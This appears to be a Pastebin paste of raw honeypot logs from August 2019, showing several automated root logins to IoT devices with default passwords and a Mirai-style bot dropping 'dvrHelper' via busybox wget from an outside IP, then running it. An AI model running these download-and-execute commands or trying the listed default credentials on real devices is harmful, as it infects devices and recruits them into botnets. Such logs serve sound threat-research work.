Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- {
- "datas": [],
- "inputs": {
- "2c08de6f5477": [
- {
- "eventid": "command.input",
- "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:32:46.672Z"
- },
- {
- "eventid": "command.input",
- "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
- "timestamp": "2019-08-06T17:32:46.399Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:32:41.469Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:32:41.199Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:32:40.927Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/echo",
- "timestamp": "2019-08-06T17:32:40.642Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:32:40.364Z"
- },
- {
- "eventid": "command.input",
- "input": "cd /",
- "timestamp": "2019-08-06T17:32:40.363Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
- "timestamp": "2019-08-06T17:32:40.361Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
- "timestamp": "2019-08-06T17:32:40.356Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
- "timestamp": "2019-08-06T17:32:40.353Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
- "timestamp": "2019-08-06T17:32:40.35Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
- "timestamp": "2019-08-06T17:32:40.347Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /.t; rm /.sh; rm /.human",
- "timestamp": "2019-08-06T17:32:40.345Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
- "timestamp": "2019-08-06T17:32:40.34Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
- "timestamp": "2019-08-06T17:32:39.689Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
- "timestamp": "2019-08-06T17:32:39.684Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
- "timestamp": "2019-08-06T17:32:39.677Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
- "timestamp": "2019-08-06T17:32:39.671Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
- "timestamp": "2019-08-06T17:32:39.461Z"
- }
- ],
- "33837076c101": [
- {
- "eventid": "command.input",
- "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:34:02.945Z"
- },
- {
- "eventid": "command.input",
- "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
- "timestamp": "2019-08-06T17:34:02.742Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:34:00.825Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:34:00.622Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:34:00.386Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/echo",
- "timestamp": "2019-08-06T17:34:00.161Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:33:59.737Z"
- },
- {
- "eventid": "command.input",
- "input": "cd /",
- "timestamp": "2019-08-06T17:33:59.735Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
- "timestamp": "2019-08-06T17:33:59.732Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
- "timestamp": "2019-08-06T17:33:59.725Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
- "timestamp": "2019-08-06T17:33:59.722Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
- "timestamp": "2019-08-06T17:33:59.719Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
- "timestamp": "2019-08-06T17:33:59.716Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /.t; rm /.sh; rm /.human",
- "timestamp": "2019-08-06T17:33:59.712Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
- "timestamp": "2019-08-06T17:33:59.706Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
- "timestamp": "2019-08-06T17:33:58.538Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
- "timestamp": "2019-08-06T17:33:58.531Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
- "timestamp": "2019-08-06T17:33:58.523Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
- "timestamp": "2019-08-06T17:33:58.515Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
- "timestamp": "2019-08-06T17:33:58.38Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
- "timestamp": "2019-08-06T17:33:58.365Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
- "timestamp": "2019-08-06T17:33:58.357Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
- "timestamp": "2019-08-06T17:33:58.351Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
- "timestamp": "2019-08-06T17:33:58.344Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
- "timestamp": "2019-08-06T17:33:58.337Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
- "timestamp": "2019-08-06T17:33:58.322Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
- "timestamp": "2019-08-06T17:33:58.315Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:33:57.634Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox ps; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:33:57.425Z"
- },
- {
- "eventid": "command.input",
- "input": "bash",
- "timestamp": "2019-08-06T17:33:56.465Z"
- },
- {
- "eventid": "command.input",
- "input": "terminal",
- "timestamp": "2019-08-06T17:33:56.463Z"
- },
- {
- "eventid": "command.input",
- "input": "linuxshell",
- "timestamp": "2019-08-06T17:33:56.461Z"
- },
- {
- "eventid": "command.input",
- "input": "sh",
- "timestamp": "2019-08-06T17:33:56.459Z"
- },
- {
- "eventid": "command.input",
- "input": "shell",
- "timestamp": "2019-08-06T17:33:56.455Z"
- },
- {
- "eventid": "command.input",
- "input": "enable",
- "timestamp": "2019-08-06T17:33:56.244Z"
- },
- {
- "eventid": "login.success",
- "geoip": {
- "city_name": "",
- "country_name": "Netherlands"
- },
- "password": "t0talc0ntr0l4!",
- "timestamp": "2019-08-06T17:33:55.628Z",
- "username": "root"
- }
- ],
- "8f610699f8d2": [
- {
- "eventid": "command.input",
- "input": "/bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:33:26.74Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/echo",
- "timestamp": "2019-08-06T17:33:26.437Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:33:26.288Z"
- },
- {
- "eventid": "command.input",
- "input": "cd /",
- "timestamp": "2019-08-06T17:33:26.286Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
- "timestamp": "2019-08-06T17:33:26.28Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
- "timestamp": "2019-08-06T17:33:26.271Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
- "timestamp": "2019-08-06T17:33:26.266Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
- "timestamp": "2019-08-06T17:33:26.26Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
- "timestamp": "2019-08-06T17:33:26.257Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /.t; rm /.sh; rm /.human",
- "timestamp": "2019-08-06T17:33:26.249Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
- "timestamp": "2019-08-06T17:33:26.241Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
- "timestamp": "2019-08-06T17:33:25.931Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
- "timestamp": "2019-08-06T17:33:25.922Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
- "timestamp": "2019-08-06T17:33:25.908Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
- "timestamp": "2019-08-06T17:33:25.897Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
- "timestamp": "2019-08-06T17:33:25.725Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
- "timestamp": "2019-08-06T17:33:25.697Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
- "timestamp": "2019-08-06T17:33:25.686Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
- "timestamp": "2019-08-06T17:33:25.675Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
- "timestamp": "2019-08-06T17:33:25.665Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
- "timestamp": "2019-08-06T17:33:25.65Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
- "timestamp": "2019-08-06T17:33:25.629Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
- "timestamp": "2019-08-06T17:33:25.616Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:33:25.456Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox ps; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:33:25.301Z"
- },
- {
- "eventid": "command.input",
- "input": "bash",
- "timestamp": "2019-08-06T17:33:24.959Z"
- },
- {
- "eventid": "command.input",
- "input": "terminal",
- "timestamp": "2019-08-06T17:33:24.958Z"
- },
- {
- "eventid": "command.input",
- "input": "linuxshell",
- "timestamp": "2019-08-06T17:33:24.951Z"
- },
- {
- "eventid": "command.input",
- "input": "sh",
- "timestamp": "2019-08-06T17:33:24.95Z"
- },
- {
- "eventid": "command.input",
- "input": "shell",
- "timestamp": "2019-08-06T17:33:24.948Z"
- },
- {
- "eventid": "command.input",
- "input": "enable",
- "timestamp": "2019-08-06T17:33:24.779Z"
- },
- {
- "eventid": "login.success",
- "geoip": {
- "city_name": "",
- "country_name": "Netherlands"
- },
- "password": "t0talc0ntr0l4!",
- "timestamp": "2019-08-06T17:33:23.629Z",
- "username": "root"
- }
- ],
- "c3aee80c84a8": [
- {
- "eventid": "command.input",
- "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:34:43.292Z"
- },
- {
- "eventid": "command.input",
- "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
- "timestamp": "2019-08-06T17:34:43.014Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:33:54.963Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:33:54.681Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:33:53.801Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/echo",
- "timestamp": "2019-08-06T17:33:52.543Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:33:52.254Z"
- },
- {
- "eventid": "command.input",
- "input": "cd /",
- "timestamp": "2019-08-06T17:33:52.252Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
- "timestamp": "2019-08-06T17:33:52.25Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
- "timestamp": "2019-08-06T17:33:52.245Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
- "timestamp": "2019-08-06T17:33:52.242Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
- "timestamp": "2019-08-06T17:33:52.24Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
- "timestamp": "2019-08-06T17:33:52.237Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /.t; rm /.sh; rm /.human",
- "timestamp": "2019-08-06T17:33:52.235Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
- "timestamp": "2019-08-06T17:33:52.23Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
- "timestamp": "2019-08-06T17:33:51.627Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
- "timestamp": "2019-08-06T17:33:51.622Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
- "timestamp": "2019-08-06T17:33:51.615Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
- "timestamp": "2019-08-06T17:33:51.609Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
- "timestamp": "2019-08-06T17:33:51.367Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
- "timestamp": "2019-08-06T17:33:51.355Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
- "timestamp": "2019-08-06T17:33:51.35Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
- "timestamp": "2019-08-06T17:33:51.345Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
- "timestamp": "2019-08-06T17:33:51.34Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
- "timestamp": "2019-08-06T17:33:51.335Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
- "timestamp": "2019-08-06T17:33:51.324Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
- "timestamp": "2019-08-06T17:33:51.319Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:33:46.938Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox ps; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:33:46.039Z"
- },
- {
- "eventid": "command.input",
- "input": "bash",
- "timestamp": "2019-08-06T17:33:44.818Z"
- },
- {
- "eventid": "command.input",
- "input": "terminal",
- "timestamp": "2019-08-06T17:33:44.816Z"
- },
- {
- "eventid": "command.input",
- "input": "linuxshell",
- "timestamp": "2019-08-06T17:33:44.814Z"
- },
- {
- "eventid": "command.input",
- "input": "sh",
- "timestamp": "2019-08-06T17:33:44.813Z"
- },
- {
- "eventid": "command.input",
- "input": "shell",
- "timestamp": "2019-08-06T17:33:44.811Z"
- },
- {
- "eventid": "command.input",
- "input": "enable",
- "timestamp": "2019-08-06T17:33:44.526Z"
- },
- {
- "eventid": "login.success",
- "geoip": {
- "city_name": "",
- "country_name": "Netherlands"
- },
- "password": "vizxv",
- "timestamp": "2019-08-06T17:33:43.696Z",
- "username": "root"
- }
- ],
- "e551f86e07d6": [
- {
- "eventid": "command.input",
- "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:34:33.79Z"
- },
- {
- "eventid": "command.input",
- "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
- "timestamp": "2019-08-06T17:34:33.55Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:34:27.41Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:34:26.038Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:34:25.801Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox cat /bin/echo",
- "timestamp": "2019-08-06T17:34:25.559Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
- "timestamp": "2019-08-06T17:34:25.124Z"
- },
- {
- "eventid": "command.input",
- "input": "cd /",
- "timestamp": "2019-08-06T17:34:25.122Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
- "timestamp": "2019-08-06T17:34:25.119Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
- "timestamp": "2019-08-06T17:34:25.116Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
- "timestamp": "2019-08-06T17:34:25.113Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
- "timestamp": "2019-08-06T17:34:25.111Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
- "timestamp": "2019-08-06T17:34:25.107Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /.t; rm /.sh; rm /.human",
- "timestamp": "2019-08-06T17:34:25.104Z"
- },
- {
- "eventid": "command.input",
- "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
- "timestamp": "2019-08-06T17:34:25.099Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
- "timestamp": "2019-08-06T17:34:23.668Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
- "timestamp": "2019-08-06T17:34:23.662Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
- "timestamp": "2019-08-06T17:34:23.655Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
- "timestamp": "2019-08-06T17:34:23.647Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
- "timestamp": "2019-08-06T17:34:22.913Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
- "timestamp": "2019-08-06T17:34:22.9Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
- "timestamp": "2019-08-06T17:34:22.894Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
- "timestamp": "2019-08-06T17:34:22.888Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
- "timestamp": "2019-08-06T17:34:22.882Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
- "timestamp": "2019-08-06T17:34:22.877Z"
- },
- {
- "eventid": "command.input",
- "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
